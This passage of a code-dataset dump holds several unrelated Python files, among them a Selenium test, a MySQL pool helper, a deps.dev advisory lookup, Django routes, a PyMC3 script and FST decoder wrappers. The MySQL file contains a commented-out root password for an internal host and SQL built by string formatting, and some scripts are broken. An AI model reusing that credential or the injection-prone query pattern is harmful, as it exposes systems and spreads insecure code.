driver.find_element_by_id(\"lastname\")\n\n# click the item \naction.click(on_element = last_name) \n\nlast_name.send_keys(\"wright\")\naction.click(on_element = first_name) \n \n# perform the operation \naction.perform() \n\nexpected_result = \"Samuel Elijah\"\nresult = first_name.get_attribute(\"value\")\n\ndriver.close()\n\nassert expected_result == result\n","sub_path":"manipulate_personal_details.py","file_name":"manipulate_personal_details.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"27093124","text":"import pymysql\nfrom DBUtils.PooledDB import PooledDB\n\n\n\nclass MysqlPool:\n\n def __init__(self, host, port,user, password, db):\n self.host = host\n self.port = port # 端口号\n self.user = user # 用户名\n self.password = password # 密码\n self.db = db # 库\n\n def connect(self):\n try:\n self.pool = PooledDB(\n creator=pymysql, # 使用链接数据库的模块\n maxconnections=64, # 连接池允许的最大连接数,0和None表示不限制连接数\n mincached=2, # 初始化时,链接池中至少创建的空闲的链接,0表示不创建\n maxcached=5, # 链接池中最多闲置的链接,0和None不限制\n maxshared=1,\n # 链接池中最多共享的链接数量,0和None表示全部共享。PS: 无用,因为pymysql和MySQLdb等模块的 threadsafety都为1,所有值无论设置为多少,_maxcached永远为0,所以永远是所有链接都共享。\n blocking=True, # 连接池中如果没有可用连接后,是否阻塞等待。True,等待;False,不等待然后报错\n maxusage=None, # 一个链接最多被重复使用的次数,None表示无限制\n setsession=[], # 开始会话前执行的命令列表。如:[\"set datestyle to ...\", \"set time zone ...\"]\n ping=0,\n # ping MySQL服务端,检查是否服务可用。\n # 如:0 = None = never,\n # 1 = default = whenever it is requested,\n # 2 = when a cursor is created,\n # 4 = when a query is executed,\n # 7 = always\n host=self.host,\n port=self.port,\n user=self.user,\n password=self.password,\n database=self.db,\n charset='utf8'\n )\n except Exception as e:\n msg = 'mysql连接失败:{}'.format(e)\n print(msg)\n return msg\n\n def execute_select_need_fetch(self, sql, fetch_type=2, many=10):\n return self.execute(sql, fetch_type=fetch_type, many=many, commmit=False)\n\n def execute_commit_not_fetch(self, sql):\n return self.execute(sql, fetch_type=0)\n\n def execute(self, sql, fetch_type=2, many=10, commmit=True):\n \"\"\"\n :param sql:\n :param commmit: insert,update,delete 等类型需要提交commit操作\n :param fetch_type: fetchone, fetchall, fetchmany\n :param many: fetchmany需要指定数量\n :return:\n \"\"\"\n\n conn = self.pool.connection() # 从连接池创建连接\n cur = conn.cursor(pymysql.cursors.DictCursor)\n # cur = conn.cursor()\n\n row = None\n err_msg = None\n datas = None\n\n try:\n row = cur.execute(sql) # ret是执行受影响的行的数量\n if commmit:\n conn.commit()\n if fetch_type == 0: # 不需要取数据\n pass\n elif fetch_type == 1:\n datas = cur.fetchone() # 获取查询到的所有数据\n elif fetch_type == 2:\n datas = cur.fetchall() # 获取查询到的所有数据\n elif fetch_type == 3:\n datas = cur.fetchmany(many) # 获取查询到的10条数据\n # conn.insert_id() # 插入成功后返回的id\n\n except pymysql.Error as e:\n conn.rollback()\n err_msg = \"发生错误:{};sql:{}\".format(e, sql)\n\n finally:\n cur.close()\n conn.close()\n\n return row, err_msg, datas\n\n def close(self):\n self.pool.close()\n\nif __name__ == '__main__':\n\n \"\"\"\n CREATE TABLE IF NOT EXISTS `hotelgg_tel`(\n `id` INT UNSIGNED AUTO_INCREMENT,\n `hotel_id` INT(15) UNSIGNED NOT NULL,\n `decode` VARCHAR(100) NOT NULL,\n `tel` VARCHAR(20) default '0',\n PRIMARY KEY ( `id` )\n )ENGINE=InnoDB DEFAULT CHARSET=utf8;\n \"\"\"\n\n \"alter table hotelgg_tel change hotelid hotel_id VARCHAR DEFAULT 0\"\n \"alter table hotelgg_tel add tel int(15) default '0';\"\n \"DELETE FROM hotelgg_tel WHERE tel =0;\"\n \"UPDATE hotelgg_tel SET tel={} WHERE hotel_id={};\"\n \"INSERT INTO {} (hotel_id,decode) VALUES ({},'{}')\"\n \"SELECT max(id) FROM table\" # 查询最后一条数据的id值\n \"truncate label_history_6v8_2;\" # 清空表\n\n # host='127.0.0.1'\n # port=3306\n # user='root'\n # password=\"mysql\"\n # db=\"hotel\"\n\n # host = '192.168.100.22'\n # port = 3306\n # user = 'root'\n # password = \"ChinaDASS@2020\"\n # db = \"chinadaas\"\n\n # msyql = MysqlPool(host='127.0.0.1', port=3306, user='root', password=\"mysql\", db=\"hotel\")\n mysql = MysqlPool()\n flag = mysql.connect()\n if flag:\n print(flag)\n row, err_msg, datas = mysql.execute_select_need_fetch(\"select * from jsyh_label where id=3\", fetch_type=1)\n print(row)\n print(err_msg)\n print(datas)\n mysql.close()\n\n\n","sub_path":"api/extensions/mysql_tools.py","file_name":"mysql_tools.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"217733578","text":"import json\nimport requests\nfrom urllib.parse import quote\n\n__DEPSDEVAPIURL = \"https://deps.dev/_/s/{ecosystem}/p/{package}/v/{version}\"\n__DEPSDEVADVISORYURL = \"https://deps.dev/_/advisory/{source}/{source_id}\"\n__SEVERITY_DICT = {\n \"UNKNOWN\": 1,\n \"NONE\": 1,\n \"LOW\": 3,\n \"MEDIUM\": 5,\n \"HIGH\": 7,\n \"CRITICAL\": 10,\n}\n\n\ndef get_vulns_from_depsdev(ecosystem, package_name, version):\n result = []\n\n package_name = quote(package_name, safe='')\n url = __DEPSDEVAPIURL.format(ecosystem=ecosystem, package=package_name, version=version)\n\n resp = requests.get(url)\n if resp.status_code == 200:\n data = json.loads(resp.content)\n\n # 获取组件自身漏洞\n if \"version\" in data.keys(): # deps.dev版本展示有错误,有一些组件展示的与go.mod中不一致\n if len(data[\"version\"][\"advisories\"]) > 0:\n for advisorie in data[\"version\"][\"advisories\"]:\n vuln = {}\n vuln[\"vuln_id\"] = advisorie[\"sourceID\"]\n vuln[\"title\"] = advisorie[\"title\"]\n vuln[\"severity\"] = __SEVERITY_DICT[advisorie[\"severity\"]]\n vuln[\"description\"] = advisorie[\"description\"]\n\n cves = []\n for cve in advisorie[\"CVEs\"]:\n cves.append(cve)\n\n vuln[\"cves\"] = json.dumps(cves)\n vuln[\"reference\"] = advisorie[\"sourceURL\"]\n\n # 获取全部影响版本\n source = advisorie[\"source\"]\n affected_versions = __get_affected_versions(package_name, source, vuln[\"vuln_id\"])\n vuln[\"affected_versions\"] = affected_versions\n\n result.append(vuln)\n\n return result\n\ndef __get_affected_versions(package_name, source, source_id):\n result = []\n\n url = __DEPSDEVADVISORYURL.format(source=source, source_id=source_id)\n resp = requests.get(url)\n if resp.status_code == 200:\n data = json.loads(resp.content)\n\n for pkg in data[\"packages\"]:\n if pkg[\"package\"][\"name\"] != package_name:\n continue\n\n if len(pkg[\"versionsAffected\"]) > 0:\n for version in pkg[\"versionsAffected\"]:\n result.append(version[\"version\"])\n return result","sub_path":"core/vuln_apis/depsdev.py","file_name":"depsdev.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"533137107","text":"from django.conf.urls import url\r\n\r\nfrom . import views\r\n\r\napp_name = 'multivers'\r\n\r\nurlpatterns = [\r\n url(r'^$', view=views.Index.as_view(), name='index'),\r\n url(r'^code(/(?P[0-9]+))?$', view=views.SaveCode.as_view(), name='code'),\r\n\r\n url(r'^customer/(?P[0-9]+)/edit$', view=views.CustomerUpdate.as_view(), name='customer_update'),\r\n url(r'^location/(?P[0-9]+)/edit$', view=views.LocationUpdate.as_view(), name='location_update'),\r\n url(r'^settings/(?P[0-9]+)/edit$', view=views.SettingsUpdate.as_view(), name='settings_update'),\r\n\r\n url(r'^products$', view=views.Products.as_view(), name='products'),\r\n url(r'^product/add$', view=views.ProductCreate.as_view(), name='product_add'),\r\n url(r'^product/(?P[0-9]+)/edit$', view=views.ProductUpdate.as_view(), name='product_edit'),\r\n url(r'^product/(?P[0-9]+)/delete$', view=views.ProductDelete.as_view(), name='product_delete'),\r\n\r\n url(r'^order/(?P[0-9]+)$', view=views.ConceptOrderView.as_view(), name='order_view'),\r\n url(r'^order/(?P[0-9]+)/delete$', view=views.ConceptOrderDelete.as_view(), name='order_delete'),\r\n url(r'^order/createFromFile$', view=views.OrdersCreateFromFile.as_view(), name='orders_create_from_file'),\r\n url(r'^order/sendAll$', view=views.OrdersSendAllView.as_view(), name='orders_send_all'),\r\n\r\n url(r'^order/(?P[0-9]+)/drink/create$', view=views.ConceptOrderDrinkCreateView.as_view(), name='order_drink_create'),\r\n url(r'^order/drink/(?P[0-9]+)/edit$', view=views.ConceptOrderDrinkEditView.as_view(), name='order_drink_edit'),\r\n url(r'^order/drink/(?P[0-9]+)/delete$', view=views.ConceptOrderDrinkDeleteView.as_view(), name='order_drink_delete'),\r\n\r\n url(r'^order/drink/(?P[0-9]+)/line/create', view=views.ConceptOrderDrinkLineCreateView.as_view(), name='order_drink_line_create'),\r\n url(r'^order/drink/line/(?P[0-9]+)/edit', view=views.ConceptOrderDrinkLineEditView.as_view(), name='order_drink_line_edit'),\r\n url(r'^order/drink/line/(?P[0-9]+)/delete', view=views.ConceptOrderDrinkLineDeleteView.as_view(), name='order_drink_line_delete'),\r\n\r\n url(r'^test$', view=views.test, name='test'),\r\n]\r\n","sub_path":"apps/multivers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"476135255","text":"from django.urls import path\nfrom . import views\n\napp_name = 'news'\n\nurlpatterns = [\n path('', views.index, name='index'),\n\n path('index2/', views.index2, name='index2'),\n path('/', views.detail, name='detail'),\n path('/results/', views.results, name='results'),\n path('/vote/', views.vote, name='vote'),\n\n # path('index2/', views.IndexView.as_view(), name='index'),\n # path('/', views.DetailView.as_view(), name='detail'),\n # path('/results/', views.ResultsView.as_view(), name='results'),\n # path('/vote/', views.vote, name='vote'),\n\n path(route='art/', view=views.page, name='art'),\n path('edit/', views.edit, name='edit'),\n path('save', views.save, name='save'),\n path('delete/', views.delete, name='delete'),\n]\n","sub_path":"API/PYTHON/django/blogTest/news/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"20272179","text":"import pandas as pd\r\nimport os\r\nfrom createxlsx import *\r\nimport json\r\nimport datetime\r\n\r\n#file containing data for after login is sucessful\r\nFILE_NAME = \"final.xlsx\"\r\ndatabase_template = pd.DataFrame([],[],[\"UID\",\"data\"]).set_index([\"UID\"])\r\ndatabase_template.loc[\"admin\"] = {\"admin\":{\"data\":\"admin\",\"status\":\"pending\"}}\r\n\r\n#function for new inputs\r\n#no returns its always sucessful\r\ndef new_entry(uid,inp):\r\n new_excel(database_template,FILE_NAME)\r\n handle = pd.read_excel(FILE_NAME,index_col=\"UID\")\r\n users = handle.index\r\n if(uid in users):\r\n old_data = handle.loc[uid][\"data\"] #reads old data\r\n old_data = old_data.replace(\"\\'\",\"\\\"\") #replaces ' with \"\r\n old_data = json.loads(old_data) #reads string converts to dict\r\n #stamp = date+time unique id\r\n hash = str(datetime.datetime.now().date()) + \"+\" + str(str(datetime.datetime.now().time()))\r\n #data is stored in the form-\r\n #excel file -> uid -> data column -> dict(explained below)\r\n #{datetime stamp : {data:\" \",status:\" \"} , {}}\r\n old_data[hash] = {\"data\":inp,\"status\":\"pending\"}\r\n handle.loc[uid][\"data\"] = old_data\r\n else:\r\n hash = str(datetime.datetime.now().date()) + \"+\" + str(str(datetime.datetime.now().time()))\r\n temp = dict()\r\n temp[hash] = {\"data\":inp,\"status\":\"pending\"}\r\n handle.loc[uid] = [temp]\r\n create_excel(handle,FILE_NAME)\r\n\r\n#new_entry(\"dkw\",\"34sercdf b65 rfghb tyughbjn\")\r\n\r\n#function to check previous entries\r\n#sucessful = (1,data in dictionary form as it was stored, see above)\r\n#fail = (0,\"No record found\")\r\ndef old_entry(uid):\r\n new_excel(database_template,FILE_NAME)\r\n handle = pd.read_excel(FILE_NAME,index_col=\"UID\")\r\n users = handle.index\r\n if(uid in users):\r\n temp = (handle.loc[uid][\"data\"])\r\n temp = str(temp)\r\n temp = temp.replace(\"\\'\",\"\\\"\")\r\n temp = json.loads(temp)\r\n return (1,temp)\r\n else:\r\n return (0,\"No record found\")\r\n#print((old_entry(\"dk\")))\r\n","sub_path":"Smart_Help/userlevel.py","file_name":"userlevel.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"388733023","text":"#!/usr/bin/env python3\nimport os\nimport re\nimport numpy as np\nfrom PIL import Image\nimport fnmatch\nfrom pathlib import Path\nfrom .cocoobjects import COCOimage, COCOann\n\nconvert = lambda text: int(text) if text.isdigit() else text.lower()\nnatrual_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]\n\n\n# filter images methods\n\ndef filter_for_img(root, files, file_types=None):\n if file_types is None:\n file_types = ['*.jpeg', '*.jpg']\n file_types = r'|'.join([fnmatch.translate(x) for x in file_types])\n files = [os.path.join(root, f) for f in files]\n files = [f for f in files if re.match(file_types, f)]\n return files\n\n\ndef filter_for_annotations(root, files, image_filename, file_types=None):\n if file_types is None:\n file_types = ['*.png']\n file_types = r'|'.join([fnmatch.translate(x) for x in file_types])\n basename_no_extension = os.path.splitext(os.path.basename(image_filename))[0]\n file_name_prefix = basename_no_extension + '.*'\n files = [os.path.join(root, f) for f in files]\n files = [f for f in files if re.match(file_types, f)]\n files = [f for f in files if re.match(file_name_prefix, os.path.splitext(os.path.basename(f))[0])]\n return files\n\ndef convert2coco(coco_header, IMAGE_DIR, ANNOTATION_DIR, img_file_types=None, ann_file_types=None ):\n coco_output = coco_header.copy()\n CATEGORIES = coco_header[\"categories\"]\n segmentation_id = 1\n\n # filter for jpeg images\n for root, _, files in os.walk(IMAGE_DIR):\n image_files = filter_for_img(root, files, file_types=img_file_types)\n\n # go through each image\n for image_filename in image_files:\n image_id = int(Path(image_filename).stem)\n image_info = COCOimage(image_id, image_filename).todict()\n coco_output[\"images\"].append(image_info)\n\n # filter for associated png annotations\n for root, _, files in os.walk(ANNOTATION_DIR):\n annotation_files = filter_for_annotations(root, files, image_filename, file_types=ann_file_types)\n\n # go through each associated annotation\n for annotation_filename in annotation_files:\n\n print(annotation_filename)\n class_id = [x['id'] for x in CATEGORIES if x['name'] in annotation_filename][0]\n\n category_info = {'id': class_id, 'is_crowd': 'crowd' in image_filename}\n\n annotation_info = COCOann(segmentation_id, image_id, category_info, annotation_filename,\n image_size=[image_info['width'], image_info['height']]).todict()\n\n if annotation_info is not None:\n coco_output[\"annotations\"].append(annotation_info)\n\n segmentation_id = segmentation_id + 1\n return coco_output","sub_path":"medicalpycoco/medicalpycocotools.py","file_name":"medicalpycocotools.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"622864019","text":"from __future__ import annotations\nfrom dataclasses import dataclass\nfrom typing import Tuple\n\nfrom slowmo.Task import Task\n\n\n@dataclass(frozen=True)\nclass TaskTree:\n task: Task\n subtrees: Tuple[TaskTree, ...] = tuple()\n\n @staticmethod\n def get_at(tt: TaskTree, path: Tuple[int, ...]) -> TaskTree:\n if len(path) == 0:\n return tt\n\n ix = path[0]\n st = tt.subtrees[ix]\n return TaskTree.get_at(st, path[1:])\n\n @staticmethod\n def replace_at(\n tt: TaskTree, path: Tuple[int, ...], replace: Callable[[TaskTree], TaskTree]\n ) -> TaskTree:\n if len(path) == 0:\n return replace(tt)\n ix = path[0]\n sts = tt.subtrees\n subtrees = (\n *sts[:ix],\n TaskTree.replace_at(sts[ix], path[1:], replace),\n *sts[ix + 1 :],\n )\n return TaskTree(tt.task, subtrees)\n\n @staticmethod\n def add_subtree(tt: TaskTree, st: TaskTree) -> TaskTree:\n return TaskTree(tt.task, tt.subtrees + (st,))\n\n @staticmethod\n def display(tt: TaskTree, path=tuple(), spinner=\"X\") -> str:\n d = [\"\\t\" * len(path) + Task.display(tt.task, spinner)]\n for i, st in enumerate(tt.subtrees):\n d += [TaskTree.display(st, path + (i,), spinner)]\n return \"\\n\".join(d)\n\n @staticmethod\n def size(root: TaskTree) -> int:\n if len(root.subtrees) == 0:\n return 1\n return 1 + sum(TaskTree.size(st) for st in root.subtrees)\n","sub_path":"WebCrawler/venv/lib/python3.7/site-packages/slowmo/TaskTree.py","file_name":"TaskTree.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"146329241","text":"#number guessing\nimport random\n\nnum = random.randint(1,100)\nprint(\"Hi,welcome to the Mathlogic.Have fun by playing this game.For help,I will provide you the clues.\\nMaximun attempts : 5 \")\nrecord = int(input(\"Enter any number between 1 and 100: \")) \nattempts = 1\nscore = 10\nmax_attempts = 5\nwhile True:\n def even_or_odd():\n if num%2 == 0:\n print(\"Clue 1: Computer guessed an even number.\")\n else:\n print(\"Clue 1: Computer guessed an odd number.\")\n def div_5():\n clue2 = num % 5\n print(f\"Clue 2: If the number is divided by 5,then it leaves a remainder: {clue2}\")\n def final_clue():\n num_str = str(num)\n print(\"Final clue: Number ends with : \",num_str[-1])\n\n if max_attempts <= 5 and max_attempts > 1:\n if num == record:\n print(f\"Your guess matches with the computer in {attempts} attempts with score: {score}pts.\")\n attempts = 1\n score = 10\n break\n \n elif num > record:\n max_attempts = max_attempts -1\n print(f\"\\nChoose a number which is greater than the previous number.\\nRemaining attempts left:{max_attempts}\")\n attempts = attempts + 1\n score = score - 1\n if attempts == 2:\n even_or_odd()\n elif attempts == 4:\n div_5() \n elif attempts == 5:\n final_clue() \n record = int(input(\"Enter any number between 1 and 100: \"))\n \n elif num < record:\n max_attempts = max_attempts -1\n print(f\"\\nChoose a number which is lower than the previous number.\\nRemaining attempts left:{max_attempts}\")\n attempts = attempts + 1\n score = score - 1\n if attempts == 2:\n even_or_odd()\n elif attempts == 4:\n div_5() \n elif attempts == 5:\n final_clue() \n record = int(input(\"Enter any number between 1 and 100: \"))\n \n else:\n print(\"\\nMaximum attempts are reached. You lost the game.\\nThe number which you missed:\",num)\n break","sub_path":"beg/umber_guessing.py","file_name":"umber_guessing.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"529645882","text":"from __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nimport os\nimport sys\nimport logging\nimport pickle\nimport numpy as np\n\nfrom keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import Embedding, Bidirectional, LSTM\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras_contrib.layers import CRF\n\nEPOCHS = 10\nEMBEDDING_DIM = 200\nBiLSTM_HIDDEN_DIM = 200\n\nerror_dict = {\n 'R': 1,\n 'M': 2,\n 'S': 3,\n 'W': 4\n}\n\ndef get_idx_from_sent(sent, word_idx_map):\n x = []\n\n for word in sent:\n if word in word_idx_map:\n x.append(word_idx_map[word])\n else:\n x.append(1)\n return x\n\ndef make_idx_data(revs, word_idx_map, maxlen=60):\n X_train, X_test, y_train = [], [], []\n for rev in revs:\n sent = get_idx_from_sent(rev['text'], word_idx_map)\n\n if rev['option'] == 'train':\n y = rev['label']\n\n X_train.append(sent)\n y_train.append(y)\n\n elif rev['option'] == 'test':\n X_test.append(sent)\n\n X_train = sequence.pad_sequences(np.array(X_train), maxlen=maxlen)\n X_test = sequence.pad_sequences(np.array(X_test), maxlen=maxlen)\n # X_valid = sequence.pad_sequences(np.array(X_valid), maxlen=maxlen)\n y_train = sequence.pad_sequences(np.array(y_train), maxlen=maxlen)\n y_train = np.reshape(y_train, (y_train.shape[0], y_train.shape[1], 1))\n\n print(X_train.shape)\n print(y_train.shape)\n print(X_test.shape)\n return X_train, y_train, X_test\n\nif __name__ == '__main__':\n program = os.path.basename(sys.argv[0])\n logger = logging.getLogger(program)\n \n logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s')\n logging.root.setLevel(level=logging.INFO)\n logger.info(r\"running %s\" % ''.join(sys.argv))\n\n logging.info('loading data...')\n pickle_file = os.path.join('pickle', 'cged_hsk_cwe.pickle3')\n revs, W, word_idx_map, vocab, maxlen = pickle.load(open(pickle_file, 'rb'))\n logging.info('data loaded!')\n\n X_train, y_train, X_test = make_idx_data(revs, word_idx_map, maxlen=maxlen)\n\n\n num_words = W.shape[0]\n logging.info(\"number of word vector [num_words]: %d\" % num_words)\n\n embdding_dim = W.shape[1] # 400\n logging.info(\"dimension num of word vector [embdding_dim]: %d\" % embdding_dim)\n\n # --------------\n # 1. Regular CRF\n # --------------\n\n print('==== training CRF ====')\n\n model = Sequential()\n model.add(Embedding(num_words, embdding_dim, mask_zero=True, weights=[W], trainable=False)) # pre-trained embedding\n crf = CRF(len(error_dict), sparse_target=True)\n model.add(crf)\n\n model.compile('adam', loss=crf.loss_function, metrics=[crf.accuracy])\n model.fit(X_train, y_train, epochs=EPOCHS, validation_data=[X_train, y_train])\n\n y_test_pred = model.predict(X_test).argmax(-1)\n print(y_test_pred)\n\n y_pred = []\n for i in range(len(y_test_pred)):\n line_data = y_test_pred[i]\n for j in range(len(line_data)):\n y_pred.append(line_data[j])\n\n print(y_pred.count(0))\n print(y_pred.count(1))\n print(y_pred.count(2))\n print(y_pred.count(3))\n print(y_pred.count(4))","sub_path":"cged16_hsk_vector_crf.py","file_name":"cged16_hsk_vector_crf.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"215681826","text":"import os\nfrom unittest.mock import patch\n\nfrom rotkehlchen.fval import FVal\nfrom rotkehlchen.order_formatting import Trade, TradeType\nfrom rotkehlchen.poloniex import Poloniex, trade_from_poloniex\n\n\ndef test_trade_from_poloniex():\n amount = FVal(613.79427133)\n rate = FVal(0.00022999)\n perc_fee = FVal(0.0015)\n cost = amount * rate\n poloniex_trade = {\n 'globalTradeID': 192167,\n 'tradeID': FVal(3727.0),\n 'date': '2017-07-22 21:18:37',\n 'rate': rate,\n 'amount': amount,\n 'total': FVal(0.14116654),\n 'fee': perc_fee,\n 'orderNumber': FVal(2315432.0),\n 'type': 'sell',\n 'category': 'exchange',\n }\n\n trade = trade_from_poloniex(poloniex_trade, 'BTC_ETH')\n\n assert isinstance(trade, Trade)\n assert isinstance(trade.timestamp, int)\n assert trade.timestamp == 1500758317\n assert trade.trade_type == TradeType.SELL\n assert trade.rate == rate\n assert trade.amount == amount\n assert trade.pair == 'ETH_BTC'\n assert trade.fee == cost * perc_fee\n assert trade.fee_currency == 'BTC'\n assert trade.location == 'poloniex'\n\n\ndef test_query_trade_history_not_shared_cache(data_dir):\n \"\"\"Test that having 2 different poloniex instances does not use same cache\n\n Regression test for https://github.com/rotkehlchenio/rotkehlchen/issues/232\n We are using poloniex as an example here. Essentially tests all exchange caches.\n \"\"\"\n\n def first_trades(currencyPair, start, end):\n return {'BTC': [{'data': 1}]}\n\n def second_trades(currencyPair, start, end):\n return {'BTC': [{'data': 2}]}\n\n end_ts = 99999999999\n first_user_dir = os.path.join(data_dir, 'first')\n os.mkdir(first_user_dir)\n second_user_dir = os.path.join(data_dir, 'second')\n os.mkdir(second_user_dir)\n a = Poloniex(b'', b'', None, first_user_dir)\n with patch.object(a, 'returnTradeHistory', side_effect=first_trades):\n result1 = a.query_trade_history(0, end_ts, end_ts)\n\n b = Poloniex(b'', b'', None, second_user_dir)\n with patch.object(b, 'returnTradeHistory', side_effect=second_trades):\n result2 = b.query_trade_history(0, end_ts, end_ts)\n\n assert result1['BTC'][0]['data'] == 1\n assert result2['BTC'][0]['data'] == 2\n","sub_path":"rotkehlchen/tests/test_poloniex.py","file_name":"test_poloniex.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"249108137","text":"'''\nCreated on Sep 8, 2019\n\n@author: snake91\n'''\n\nimport pymc3 as pm\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport mle.simulate as sim\n\n\nnp.random.seed(1)\nphi1 = 0.1\n\n\ny = sim.arpGaussian(t = 200, phi = [phi1])\n\n\n\ndef b0_bayesianmodel(y):\n with pm.Model() as model: # model specifications in PyMC3 are wrapped in a with-statement\n # Define priors\n # sigma = HalfCauchy('sigma', beta=10, testval=1.)\n sigma = 1\n intercept = pm.Uniform('phi1', -0.99, 0.99)\n x_coeff = phi1#Normal('x', 0, sd=20)\n \n # Define likelihood\n likelihood = pm.Normal('y', mu= np.hstack([[0], phi1 * y[1:]]), \n sd=sigma, observed=y)\n \n # Inference!\n trace = pm.sample(1000, tune = 500, progressbar=True, chains = 2, cores=4) # draw posterior samples using NUTS sampling\n# print(trace)\n\n pm.traceplot(trace, var_names = ['phi1'])\n plt.tight_layout();\n\n return pm.summary(trace, var_names = ['phi1'])\n\n\n\ndef b0b1_bayesianmodel(x, y):\n with pm.Model() as model: # model specifications in PyMC3 are wrapped in a with-statement\n # Define priors \n # sigma = HalfCauchy('sigma', beta=10, testval=1.)\n sigma = pm.HalfCauchy('sigma', beta = 10)\n intercept = pm.Normal('b0', 10, sd=2)\n x_coeff = pm.Normal('b1', 10, sd=20)\n \n # Define likelihood\n likelihood = pm.Normal('y', mu=intercept + x_coeff * x, \n sd=sigma, observed=y)\n \n # Inference!\n trace = pm.sample(4000, tune = 2000, progressbar=True, chains = 10, cores=4) # draw posterior samples using NUTS sampling\n# print(trace)\n\n pm.traceplot(trace, var_names = ['b0', 'b1', 'sigma'])\n plt.tight_layout();\n\n return pm.summary(trace, var_names = ['b0', 'b1', 'sigma'])\n\n\n\nresb0 = b0_bayesianmodel(y)\nresb0b1 = b0b1_bayesianmodel(y)\n \nprint(\"\")\n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","sub_path":"stats/mle/tests/bayes_AR1.py","file_name":"bayes_AR1.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"219184722","text":"#!/usr/bin/env python\n# -*- coding:utf8 -*-\n\nfrom subprocess import Popen, PIPE\nimport os.path\n\nclass Decoder:\n\n def __init__(self, lm):\n self.lm = lm\n\n self.initial_state = 0\n self.final_state = 0\n self.state = 0\n self.output_filename = None\n self.output_file = None\n\n def __del__(self):\n if self.output_file:\n self.output_file.close()\n\n def set_output_filename(self, filename):\n if self.output_filename:\n self.output_file.close()\n self.output_filename = None\n self.output_filename = filename\n self.output_file = open(self.output_filename, 'w')\n\n def increment_state(self):\n self.state += 1\n return self\n\n def get_current_state(self):\n return self.state\n\n def write(self, data):\n if self.decoder_input:\n self.decoder_input(data)\n if self.output_file:\n self.output_file.write(data)\n\n def get_blank_symbol(self):\n # SolFST ならオーバーライドする\n return u''\n\n def set_initial(self, state=0):\n # 必要に応じてオーバーライドする\n self.initial_state = state\n return self\n\n def set_final(self, state=None):\n # 必要に応じてオーバーライドする\n if state:\n self.final_state = satae\n else:\n self.final_state = self.state\n return self\n\n def add_arc(self, insym, outsym, weight=None):\n # オーバーライドする\n return self\n\n def shortestpath(self):\n # オーバーライドする\n return u''\n\n\n\nclass DecoderSolFST(Decoder):\n\n def __init__(self, lm):\n Decoder.__init__(self, lm)\n self.decoder_command = Popen([os.path.join('.', 'bin', 'MySolfstDecoder'), self.lm], stdin=PIPE, stdout=PIPE)\n self.decoder_input = self.decoder_command.stdin.write\n\n def get_blank_symbol(self):\n return u'blank'\n\n def set_initial(self, state=0):\n Decoder.set_initial(self, state)\n self.write('#FSTBasic MinPlus\\n')\n self.write('I {}\\n'.format(self.initial_state))\n return self\n\n def set_final(self, state=None):\n Decoder.set_final(self, state)\n self.write('F {}\\n'.format(self.final_state))\n return self\n\n def add_arc(self, insym, outsym, weight=None):\n weight = weight if weight else ''\n data = \"T {} {} {} {} {}\\n\".format(self.state, self.state + 1, insym, outsym, weight)\n self.write(data)\n return self\n\n def shortestpath(self):\n self.decoder_command.stdin.close()\n return self.decoder_command.stdout.readline().decode('utf-8').strip()\n\n\n\n# import pywrapfst as pwfst\n\nclass DecoderOpenFST(Decoder):\n\n def __init__(self, lm):\n Decoder.__init__(self, lm)\n self.lm_obj = pwfst.Fst.read(self.lm)\n self.chars_syms = pwfst.SymbolTable.read_text(os.path.join(os.path.dirname(self.lm), \"chars.txt\"))\n self.words_syms = pwfst.SymbolTable.read_text(os.path.join(os.path.dirname(self.lm), \"words.txt\"))\n\n self.lm_obj.set_input_symbols( self.chars_syms )\n self.lm_obj.set_output_symbols( self.words_syms )\n\n def set_initial(self, state=0):\n self.compiler = None\n\n self.compiler = pwfst.Compiler(\n isymbols=self.chars_syms,\n osymbols=self.chars_syms,\n keep_isymbols=True,\n keep_osymbols=True\n )\n self.decoder_input = self.compiler.write\n return self\n\n def set_final(self, state=None):\n Decoder.set_final(self, state)\n self.write('{}\\n'.format(self.final_state))\n return self\n\n def add_arc(self, insym, outsym, weight=None):\n weight = weight if weight else ''\n data = \"{} {} {} {} {}\\n\".format(self.state, self.state + 1, insym, outsym, weight)\n self.write(data)\n return self\n\n def shortestpath(self):\n\n f = self.compiler.compile()\n f.arcsort()\n ret = pwfst.compose(f, self.lm_obj)\n\n ret.set_input_symbols( self.chars_syms )\n ret.set_output_symbols( self.words_syms )\n wfst = pwfst.shortestpath(ret).topsort()\n\n result = []\n for s in wfst.states():\n for a in 